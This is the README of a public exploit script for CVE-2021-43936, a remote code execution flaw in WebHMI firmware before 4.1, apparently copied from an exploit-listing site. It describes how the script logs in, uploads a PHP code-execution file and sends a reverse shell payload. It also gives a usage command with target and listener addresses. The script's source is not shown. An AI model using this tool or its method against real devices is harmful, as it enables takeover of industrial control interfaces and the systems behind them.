Share
## https://sploitus.com/exploit?id=8D0D908A-160D-5B77-B3DF-071F51981A04
# CVE-2021-43936

CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware.</br>
This vulnerability works on versions < 4.1.</br>
Tested only on 4.0.7475. Vulnerability is used by script in the following steps:</br>
  1. Logs into the application
  2. Uploads the PHP code execution script
  3. Sends the reverse shell payload

Exploit can fail, if there are more than one NIC attached. The solution is to try once again.

## Usage example:
`python3 cve-2021-43936.py -t 10.100.23.200 -p 80 -l 10.100.23.201 -P 80`

![Screen](img.PNG)